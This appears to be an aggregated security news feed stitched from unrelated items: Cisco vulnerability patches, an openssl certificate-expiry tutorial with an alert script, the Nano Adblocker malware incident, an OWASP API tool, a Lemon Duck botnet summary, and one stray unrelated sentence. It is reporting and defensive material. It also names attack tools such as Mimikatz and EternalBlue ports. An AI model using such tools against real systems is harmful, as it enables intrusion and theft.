The majority of the bugs in Cisco’s Firepower Threat Defense (FTD) and Adaptive Security Appliance (ASA) software can enable denial of service (DoS) on affected devices. Cisco has stomped out a slew of high-severity vulnerabilities across its lineup of network-security products. The most severe flaws can be exploited by an unauthenticated, remote attacker to launch a passel of malicious attacks — from denial of service (DoS) to cross-site request forgery (CSRF). The vulnerabilities exist in Cisco’s Firepower Threat Defense (FTD) software, which is part of its suite of network-security and traffic-management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network-security devices. The most severe of these flaws is a vulnerability in Cisco Firepower Chassis Manager (FCM), which exists in the Firepower Extensible Operating System (FXOS) and provides management capabilities. The flaw (CVE-2020-3456) ranks 8.8 out of 10 on the CVSS scale, and stems from insufficient CSRF protections in the FCM interface. It could be exploited to enable CSRF — meaning an attacker could trick an authenticated user’s browser into sending forged requests on that user’s behalf. Cisco FXOS Software is affected when it is running on Firepower 2100 Series Appliances (when running ASA Software in non-appliance mode), Firepower 4100 Series Appliances and Firepower 9300 Series Appliances. Four other high-severity vulnerabilities across Cisco’s Firepower brand could be exploited by an unauthenticated, remote attacker to cripple affected devices with a DoS condition. These include a flaw in Firepower’s Management Center Software (CVE-2020-3499), Cisco Firepower 2100 Series firewalls (CVE-2020-3562), Cisco Firepower 4110 appliances (CVE-2020-3571) and Cisco Firepower Threat Defense Software (CVE-2020-3563).
Cisco also patched multiple DoS flaws in its Adaptive Security Appliance software, including ones tied to CVE-2020-3304, CVE-2020-3529, CVE-2020-3528, CVE-2020-3554, CVE-2020-3572 and CVE-2020-3373 that could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly. Another flaw of note, in the web services interface of Cisco Adaptive Security Appliance and Firepower Threat Defense, could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The flaw stems from the software not efficiently handling the writing of large files to specific folders on the local file system. The new security alerts come a day after Cisco sent out an advisory warning that a flaw (CVE-2020-3118) in the Cisco Discovery Protocol implementation for Cisco IOS XR Software was being actively exploited by attackers. The bug, which could be exploited by unauthenticated, adjacent attackers, could allow them to execute arbitrary code or cause a reload on an affected device. Via threatpost.com
-
How do I check the TLS/SSL certificate expiration date from my Linux or Unix shell prompt? How can I find the TLS certificate expiry date from Linux or Unix shell scripts? We can quickly solve TLS or SSL certificate issues by checking the certificate’s expiration from the command line. Let us see how to determine the TLS or SSL certificate expiration date from a PEM encoded certificate file, as well as for a live production website/domain name, when using Linux, *BSD, macOS or a Unix-like system. How to check TLS/SSL certificate expiration date from command-line To check the SSL certificate expiration date, we are going to use the OpenSSL command-line client. The OpenSSL client provides tons of data, including validity dates, expiry dates, who issued the TLS/SSL certificate, and much more. Check the expiration date of an SSL or TLS certificate Open the Terminal application and then run the following command: $ openssl s_client -servername {SERVER_NAME} -connect {SERVER_NAME}:{PORT} | openssl x509 -noout -dates $ echo | openssl s_client -servername {SERVER_NAME} -connect {SERVER_NAME}:{PORT} | openssl x509 -noout -dates Let us find out the expiration date for www.nixcraft.com; enter: DOM="www.nixcraft.com" PORT="443" openssl s_client -servername $DOM -connect $DOM:$PORT \ | openssl x509 -noout -dates Sample outputs indicating dates and other information: depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3 verify return:1 depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3 verify return:1 depth=0 CN = www.nixcraft.com verify return:1 notBefore=Sep 29 23:10:07 2020 GMT notAfter=Dec 28 23:10:07 2020 GMT Add the echo command to avoid having to press CTRL+C.
For instance: DOM="www.cyberciti.biz" PORT="443" ## note echo added ## echo | openssl s_client -servername $DOM -connect $DOM:$PORT \ | openssl x509 -noout -dates OpenSSL in action: checking the TLS/SSL certificate expiration date and time Understanding openssl command options The openssl command is a very useful diagnostic tool for TLS and SSL servers. The openssl command-line options are as follows: s_client : The s_client command implements a generic SSL/TLS client which connects to a remote host using SSL/TLS. -servername $DOM : Set the TLS SNI (Server Name Indication) extension in the ClientHello message to the given value. -connect $DOM:$PORT : This specifies the host ($DOM) and optional port ($PORT) to connect to. x509 : Run the certificate display and signing utility. -noout : Prevents output of the encoded version of the certificate. -dates : Prints out the start and expiry dates of a TLS or SSL certificate. Finding the SSL certificate expiration date from a PEM encoded certificate file The syntax is as follows to query the certificate file for when the TLS/SSL certificate will expire: $ openssl x509 -enddate -noout -in {/path/to/my/my.pem} $ openssl x509 -enddate -noout -in /etc/nginx/ssl/www.cyberciti.biz.fullchain.cer.ecc $ openssl x509 -enddate -noout -in /etc/nginx/ssl/www.nixcraft.com.fullchain.cer notAfter=Dec 29 23:48:42 2020 GMT We can also check if the certificate expires within a given timeframe. For example, find out if the TLS/SSL certificate expires within the next 7 days (604800 seconds): $ openssl x509 -enddate -noout -in my.pem -checkend 604800 # Check if the TLS/SSL cert will expire in next 4 months # openssl x509 -enddate -noout -in my.pem -checkend 10520000 This tells us whether the TLS/SSL certificate has expired, or will expire within the next N days (expressed in seconds).
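As a complementary sketch (not part of the original tutorial), the notAfter= line that openssl prints can also be parsed in Python to compute how many days remain. The date format below matches the sample outputs shown above; the function name is my own.

```python
from datetime import datetime, timezone

def days_until_expiry(not_after_line, now=None):
    """Parse a line like 'notAfter=Dec 28 23:10:07 2020 GMT' (the format
    printed by `openssl x509 -enddate`) and return the number of days
    until expiry. Negative means the certificate has already expired."""
    value = not_after_line.strip().split("=", 1)[1]
    expires = datetime.strptime(value, "%b %d %H:%M:%S %Y %Z")
    expires = expires.replace(tzinfo=timezone.utc)
    now = now or datetime.now(timezone.utc)
    return (expires - now).total_seconds() / 86400

# Example using the sample output shown earlier, pinned to a reference
# date one week before expiry so the result is deterministic:
ref = datetime(2020, 12, 21, 23, 10, 7, tzinfo=timezone.utc)
days = days_until_expiry("notAfter=Dec 28 23:10:07 2020 GMT", now=ref)
```

In practice you would pipe the output of openssl x509 -noout -enddate into this, for example via subprocess, and alert when the value drops below your threshold.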
Shell script to determine SSL certificate expiration date from the crt file itself and alert sysadmin Here is a sample shell script: #!/bin/bash # Purpose: Alert sysadmin/developer about the TLS/SSL cert expiry date in advance # Author: Vivek Gite {https://www.cyberciti.biz/} under GPL v2.x+ # ------------------------------------------------------------------------------- PEM="/etc/nginx/ssl/letsencrypt/cyberciti.biz/cyberciti.biz.fullchain.cer" # 7 days in seconds DAYS="604800" # Email settings _sub="$PEM will expire within $DAYS (7 days)." _from="system-account@your-domain" _to="sysadmin@your-domain" _openssl="/usr/bin/openssl" $_openssl x509 -enddate -noout -in "$PEM" -checkend "$DAYS" | grep -q 'Certificate will expire' # Send email and push message to my mobile if [ $? -eq 0 ] then echo "${_sub}" mail -s "$_sub" -r "$_from" "$_to" <<< "Warning: The TLS/SSL certificate ($PEM) will expire soon on $HOSTNAME [$(date)]" # See https://www.cyberciti.biz/mobile-devices/android/how-to-push-send-message-to-ios-and-android-from-linux-cli/ # source ~/bin/cli_app.sh push_to_mobile "$0" "$_sub. See $_to email for detailed log. -- $HOSTNAME " >/dev/null fi See how to send push notifications to your phone from script. Of course, you need a working SMTP server to route email. At work we configured AWS SES with Postfix MTA to route all alert emails. See the following tutorials for more information about sending emails from the CLI: UNIX / Linux: Shell Scripting With mail Command Sending Email With Attachments From Unix / Linux Command [ Shell Prompt ] Howto: Send The Content Of a Text File Using mail Command In Unix / Linux Say hello to testssl and ssl-cert-check script We can use the testssl shell script, a free command-line tool which checks a server’s service on any port for the support of TLS/SSL ciphers and protocols, as well as recent cryptographic flaws and more.
Download and run it as follows: $ wget https://testssl.sh/testssl.sh $ chmod +x testssl.sh $ testssl.sh --fast --parallel https://www.cyberciti.biz/ Another option is to run the ssl-cert-check script, a Bourne shell script that can be used to report on expiring SSL certificates. The script was designed to be run from cron and can e-mail warnings or log alerts through Nagios. Conclusion In this quick tutorial, you learned how to find the TLS/SSL certificate expiration date from a PEM encoded certificate file as well as from a live website/domain name. Expired TLS/SSL certificates can cause downtime and confusion for end-users. Hence, it is crucial to monitor the expiry dates of our TLS/SSL certificates. See the following man pages: $ man x509 $ man s_client Source
-
If you have Chromium versions of Nano Adblocker or Nano Defender, pay attention. Adblocking extensions with more than 300,000 active users have been surreptitiously uploading user browsing data and tampering with users’ social media accounts thanks to malware its new owner introduced a few weeks ago, according to technical analyses and posts on Github. Hugo Xu, developer of the Nano Adblocker and Nano Defender extensions, said 17 days ago that he no longer had the time to maintain the project and had sold the rights to the versions available in Google’s Chrome Web Store. Xu told me that Nano Adblocker and Nano Defender, which often are installed together, have about 300,000 installations total. Four days ago, Raymond Hill, maker of the uBlock Origin extension upon which Nano Adblocker is based, revealed that the new developers had rolled out updates that added malicious code. The first thing Hill noticed the new extension doing was checking if the user had opened the developer console. If it was opened, the extension sent a file titled "report" to a server at https://def.dev-nano.com/. “In simple words, the extension remotely checks whether you are using the extension dev tools—which is what you would do if you wanted to find out what the extension is doing,” he wrote. The most obvious change end users noticed was that infected browsers were automatically issuing likes for large numbers of Instagram posts, with no input from users. Cyril Gorlla, an artificial intelligence and machine learning researcher at the University of California in San Diego, told me that his browser liked more than 200 images from an Instagram account that didn’t follow anyone. Nano Adblocker and Nano Defender aren’t the only extensions that have been reported to tamper with Instagram accounts.
User Agent Switcher, an extension that had more than 100,000 active users until Google removed it earlier this month, is reported to have done the same thing. Many Nano extension users in this forum reported that their infected browsers were also accessing user accounts that weren’t already open in their browsers. This has led to speculation that the updated extensions are accessing authentication cookies and using them to gain access to the user accounts. Hill said he reviewed some of the added code and found that it was uploading data. Other users reported that sites other than Instagram were also being accessed and tampered with, in some cases even when the user hadn’t accessed the site, but these claims couldn’t immediately be verified. Alexei, an Electronic Frontier Foundation senior staff technologist who works on the Privacy Badger extension, has been following the discussions and provided me with the following synopsis: Evidence collected to date shows that the extensions are covertly uploading user data and gaining unauthorized access to at least one website, in violation of Google terms of service and quite possibly applicable laws. Google has already removed the extensions from the Chrome Web Store and issued a warning that they aren’t safe. Anyone who had either of these extensions installed should remove them from their machines immediately. Nano Adblocker and Nano Defender are available in the extension stores hosted by both Firefox and Microsoft Edge. Xu and others say that neither of the extensions available in these other locations are affected. The caveat is that Edge can install extensions from the Chrome Web Store. Any Edge users who used this source are infected and should remove the extensions. The possibility that the extensions may have uploaded session cookies means that anyone who was infected should at a minimum fully log out of all sites.
In most cases this should invalidate the session cookies and prevent anyone from using them to gain unauthorized access. Truly paranoid users will want to change passwords just to be on the safe side. The incident is the latest example of someone acquiring an established browser extension or Android app and using it to infect the large user base that already has it installed. It’s hard to provide actionable advice for preventing this kind of abuse. The Nano extensions weren’t some fly-by-night operation. Users had every reason to believe they were safe until, of course, that was no longer the case. The best advice is to routinely review the extensions that are installed. Any that are no longer of use should be removed. Via arstechnica.com
-
Mr. Boca, I have friends who own betting shops (football, handball, dog racing, etc.); he did not specify that they take bets online
-
APICheck - The DevSecOps toolset for HTTP APIs APICheck is an environment for integrating existing HTTP API tools and creating execution chains easily. It is designed with third-party tool integration in mind. APICheck comprises a set of tools that can be connected to each other to achieve different functionalities, depending on how they are connected, allowing you to create execution chains. Why another REST APIs tool? APICheck aims to be a universal toolset for testing REST APIs, allowing you to mix and match the tools it provides, while enabling interoperability with third party tools. This way we hope that it will be useful to a wide spectrum of users that need to deal with REST APIs. Who is APICheck for? APICheck focuses not only on the security testing and hacking use cases; the goal of the project is to become a complete toolset for DevSecOps cycles. The tools are aimed at different user profiles: Developers System Administrators Security Engineers & Penetration Testers Pipelines & data flow In *NIX, you can chain multiple commands together in a pipeline. In a similar way, you can build APICheck pipelines by chaining the different tools together. To allow interoperability among commands and tools, all of them share a common JSON data format. In other words, APICheck commands output JSON documents, and accept them as input, too. This allows you to build pipelines. Contribution If you are a tool developer, you can integrate with APICheck tools in no more than 10 minutes. Please check the Integrating new tools guide Licensing This project is distributed under the Apache 2 license Download: www-project-apicheck-master.zip or git clone https://github.com/OWASP/www-project-apicheck.git Source
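To illustrate the shared-JSON-contract idea described above, here is a minimal sketch of what a chainable pipeline stage could look like in Python. The envelope fields used here ('request', 'headers', '_meta') and the function names are illustrative assumptions, not APICheck's actual schema.

```python
import json
import sys

def flag_missing_auth(doc):
    """Toy pipeline stage: flag requests that lack an Authorization header.

    Note: the 'request'/'headers'/'_meta' field names are hypothetical;
    a real APICheck tool would follow the project's documented format.
    """
    headers = doc.get("request", {}).get("headers", {})
    doc.setdefault("_meta", {})["missing_auth"] = "Authorization" not in headers
    return doc

def run_stage(stdin=sys.stdin, stdout=sys.stdout):
    # Read one JSON document, enrich it, and emit it for the next tool.
    # This stdin-to-stdout contract is what makes stages chainable.
    json.dump(flag_missing_auth(json.load(stdin)), stdout)
```

With run_stage wired to stdin/stdout, such a script could sit in the middle of a shell pipeline (some-producer | python this_stage.py | some-reporter), every stage reading one JSON document and writing one.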
-
The cybersecurity research firm Cisco Talos has recently detected activity linked to a cryptocurrency-mining botnet. The experts claimed that these attacks are targeting businesses across sectors such as government, retail, and technology. Some variants also support RDP brute-forcing, and experts have identified that the attackers also use tools such as Mimikatz, as it helps the botnet increase the number of systems participating in its mining pool. Lemon Duck Malware Lemon Duck is a botnet with automatic spreading capabilities. Its final payload is a modified version of the XMRig Monero cryptocurrency mining software. Lemon Duck is one of the most complicated mining botnets, with various impressive methods and techniques to cover up its operations. According to the reports, security experts have recently seen a resurgence in the number of DNS requests connected with its command-and-control and mining servers. That’s why the security experts decided to take a close look at its functionality, prioritizing previously less documented modules such as the Linux branch and the C# modules loaded by the PowerShell component. What’s new? This threat has been active since the end of December 2018, and there has been an apparent increase in its activity at the end of August 2020. Infection vectors The Cisco Talos team affirmed that they had recorded 12 independent infection vectors, ranging from standard copying over SMB shares to attempts to exploit vulnerabilities in Redis and the YARN Hadoop resource manager and job scheduler. Not only this, but the Talos experts also noticed a huge increase in the number of DNS requests connected with Lemon Duck C2 and mining servers at the end of August 2020.
GPUs used by Lemon Duck for mining GTX NVIDIA GEFORCE AMD RADEON Modular Functionalities The modules included in Lemon Duck are the primary loader, which checks the level of user privileges and the elements relevant for mining, such as the type of graphics card available. If no such GPU is identified, the loader downloads and runs the commodity XMRig CPU-based mining script. Other modules include the main spreading module, a Python-based module packaged using PyInstaller, and a killer module designed to impair known competing mining botnets. Open-source PowerShell projects whose code is included in Lemon Duck: Invoke-TheHash by Kevin Robertson Invoke-EternalBlue PowerShell EternalBlue port BlueKeep RCE exploit (CVE-2019-0708) PowerShell port Powersploit’s reflective loader by Matt Graeber Modified Invoke-Mimikatz PowerShell module Apart from this, the threat actors behind Lemon Duck want to make sure that their operation stays profitable. That’s why Lemon Duck checks all infected machines for other known crypto miners and shuts them down accordingly. Via
-